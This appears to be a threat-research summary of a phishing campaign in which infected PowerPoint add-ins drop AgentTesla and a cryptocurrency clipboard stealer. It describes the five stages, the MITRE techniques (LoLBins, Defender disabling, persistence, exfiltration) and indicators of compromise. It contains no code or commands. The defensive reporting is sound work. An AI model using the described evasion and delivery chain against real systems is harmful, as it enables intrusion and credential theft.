Threat Research

Infected PowerPoint Files Using Cloud Services to Deliver Multiple Malware

Securonix

Threat actors deliver multiple malware via malicious PowerPoint Add-Ins and a multi-stage chain that uses cloud services to host payloads. The operation blends phishing, LoLBins, VBS, and PowerShell to drop AgentTesla and a cryptocurrency stealer, with stages hosted on MediaFire, Blogger, and GitHub. #AveMaria #Warzone #AgentTesla #PowerPoint #Emotet #LoLBins #MSHTA #Bitly #MediaFire #Blogger #GitHub

Keypoints

  • Phishing-driven infection: Attacks begin with phishing emails carrying an infected PowerPoint file as an attachment.
  • Stage 01: Infected PowerPoint Add-In contains obfuscated VBA that decrypts strings at runtime to run payloads via LoLBins.
  • Stage 02: A lightly obfuscated VBS script is delivered from an HTML page and decoded/executed with JavaScript to continue the chain.
  • Stage 03: AgentTesla is deployed through a decompressed PowerShell payload that injects into a .NET process and remains fileless.
  • Stage 04: Privilege escalation and defense evasion: NSudo is used to escalate privileges, Windows Defender is disabled, and AV exclusions are added via additional VBS/INF sequences.
  • Stage 05: A cryptocurrency stealer is delivered (via a Blogger-hosted fake page) and includes VBS that either reuses AgentTesla or loads a PowerShell-based stealer; it also checks clipboard data for crypto wallets and replaces with attacker addresses.
  • Attackers increasingly leverage cloud services (MediaFire, Blogger, GitHub) and URL shorteners (Bitly) to add resilience and host payloads.

MITRE Techniques

  • [T1566.001] Phishing: Spearphishing Attachment – The infection flow starts with a phishing email that carries the infected file as an attachment. “The infection flow starts with a phishing email that carries the infected file as an attachment.”
  • [T1059.001] PowerShell – The script is executed with a combination of PowerShell and mshta, a similar technique employed by BazarLoader. “The script is executed with a combination of PowerShell and mshta, a similar technique employed by BazarLoader.”
  • [T1197] Signed Binary Proxy Execution: CMSTP – INF file is used and executed via cmstp (LoLBin) to run commands. “INF file with the command to be executed … cmstp LoLBin.”
  • [T1055] Process Injection – AgentTesla payload is injected into an instance of “aspnet_compiler.exe.” “injected into an instance of “aspnet_compiler.exe””
  • [T1027] Obfuscated/Compressed Files and Information – The VBS/script payloads are obfuscated and decoded/executed. “lightly obfuscated within an HTML page, which is decoded and executed through a simple JavaScript function.”
  • [T1547.001] Registry Run Keys/Startup Folder – Persistence via Windows registry to execute external PowerShell scripts. “Create a persistence mechanism through the Windows registry to execute two PowerShell scripts from external URLs.”
  • [T1053.005] Scheduled Task – A scheduled task executes a script from an external URL through mshta approximately every hour. “Create a scheduled task that executes a script from an external URL through mshta approximately every hour.”
  • [T1041] Exfiltration Over C2 Channel – AgentTesla sends an HTTP POST with machine information to a malicious server. “AgentTesla sends an HTTP POST request to a malicious server with information about the infected machine.”
  • [T1105] Ingress Tool Transfer – NSudo binary is downloaded from GitHub for privilege escalation. “Once running, it downloads a file from GitHub named NSudo, which is used for privilege escalation.”
  • [T1059.003] VBScript – Stage 05 uses VBS to load and execute a cryptocurrency stealer; the HTML page hides VBS code. “two malicious VBS within the HTML, which are decoded and executed with a simple JavaScript.”
  • [T1056.001] Keylogging – AgentTesla capabilities include stealing keystrokes and browser data (credential access). “AgentTesla is developed in .NET … stealing browser’s passwords, capturing keystrokes, clipboard, etc.”
  • [T1056.004] Clipboard Data – The cryptocurrency stealer checks clipboard data for wallet addresses and replaces them. “The malware is fairly simple, it works by checking the clipboard data with a regex that matches the cryptocurrency wallet pattern.”

Indicators of Compromise

  • [Domain] j.mp – Bitly shortened URL domain used to contact the mshta binary. The URL is shortened via a Bitly domain.
  • [Domain] MediaFire – Cloud hosting service used to host VBS/HTML-delivered payloads.
  • [Domain] Blogger – Fake web pages hosted on Blogger used to host or disguise payloads (including a cryptocurrency stealer page).
  • [Domain] GitHub – Source for NSudo and other payload staging; used to download components.
  • [File] NSudo – The privilege-escalation tool downloaded and executed during Stage 04.
  • [URL] Blogger-hosted pages – Fake pages used to camouflage cryptocurrency stealer stage.
  • [URL] HTML/JS payloads – HTML pages decoding and executing VBS/JS payloads.

Read more: https://www.netskope.com/blog/infected-powerpoint-files-using-cloud-services-to-deliver-multiple-malware